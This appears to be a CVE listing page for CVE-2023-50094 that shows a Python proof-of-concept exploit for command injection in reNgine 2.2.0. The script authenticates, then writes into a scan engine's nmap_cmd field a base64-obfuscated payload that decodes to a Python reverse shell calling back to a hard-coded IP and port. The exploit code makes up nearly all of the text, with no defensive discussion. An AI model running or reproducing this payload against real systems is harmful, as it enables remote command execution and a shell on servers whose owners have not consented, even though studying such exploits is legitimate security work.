4837 Total CVEs
26 Years
GitHub
Home / 2023 / CVE-2023-50094
README.md
Rendering markdown...
POC / poc.py PY
⬇ Raw GitHub ✕ Close 
import requests
import argparse
import sys

# Payload
payload = (
    'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0'
    'KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAu'
    'MjQ0LjE1MC42OSIsNjE2MTIpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihz'
    'LmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtwdHkuc3Bhd24oIi9iaW4v'
    'c2giKScg"|base64 --decode |/bin/sh'
)

def login(base_url, username, password):
    """Login to reNgine and retrieve session token."""
    login_url = f"{base_url}/api/login/"
    data = {"username": username, "password": password}
    response = requests.post(login_url, json=data)
    
    if response.status_code == 200:
        print("[+] Login successful")
        return response.cookies
    else:
        print("[-] Login failed")
        print(response.text)
        sys.exit()

def modify_scan_engine(base_url, cookies, scan_engine_id):
    """Modify the nmap_cmd parameter of a Scan Engine."""
    url = f"{base_url}/api/scanengine/{scan_engine_id}/"
    headers = {"Content-Type": "application/json"}
    data = {"nmap_cmd": payload}
    
    response = requests.patch(url, cookies=cookies, json=data, headers=headers)
    
    if response.status_code == 200:
        print("[+] Scan Engine modified successfully")
    else:
        print("[-] Failed to modify Scan Engine")
        print(response.text)
        sys.exit()

def main():
    parser = argparse.ArgumentParser(description="reNgine 2.2.0 Command Injection Exploit")
    parser.add_argument("--url", required=True, help="Base URL of the reNgine instance (e.g., http://rengine.example.com)")
    parser.add_argument("--username", required=True, help="Username for authentication")
    parser.add_argument("--password", required=True, help="Password for authentication")
    parser.add_argument("--engine-id", required=True, type=int, help="ID of the Scan Engine to modify")
    
    args = parser.parse_args()
    
    base_url = args.url
    username = args.username
    password = args.password
    scan_engine_id = args.engine_id
    
    cookies = login(base_url, username, password)
    modify_scan_engine(base_url, cookies, scan_engine_id)
    print("[+] Payload injected. Start a scan using the modified Scan Engine.")

if __name__ == "__main__":
    main()